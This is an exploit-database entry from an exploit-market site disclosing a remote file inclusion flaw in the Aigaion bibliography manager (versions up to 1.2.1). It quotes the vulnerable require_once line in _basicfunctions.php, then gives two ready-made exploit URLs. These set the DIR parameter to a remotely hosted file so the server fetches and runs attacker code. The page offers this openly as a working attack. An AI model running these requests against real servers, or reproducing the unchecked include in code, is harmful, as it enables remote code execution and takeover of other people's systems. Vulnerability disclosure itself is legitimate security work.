[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Aigaion <= 1.2.1 (DIR) Remote File Include Vulnerabilities

Author
navairum
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1162
Category
web applications
Date add
14-11-2006
Platform
unsorted
==========================================================
Aigaion <= 1.2.1 (DIR) Remote File Include Vulnerabilities
==========================================================



Software:Web based bibliography management system
Download link: http://sourceforge.net/projects/aigaion/
script:_basicfunctions.php
author: navairum

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
The script _basicfunctions.php does not specify a value for the $DIR variable before including it.
Vulnerable code:

//if this script is not called from within one of the base pages, redirect to frontpage
require_once($DIR."checkBase.php");

/* This function leads the browser to the given location */

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Exploit:
http://site/[PATH]/_basicfunctions.php?DIR=http://site/uhoh.txt?
http://site/path/pageactionauthor.php?DIR=http://site/uhoh.txt?

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------



#  0day.today [2024-07-01]  #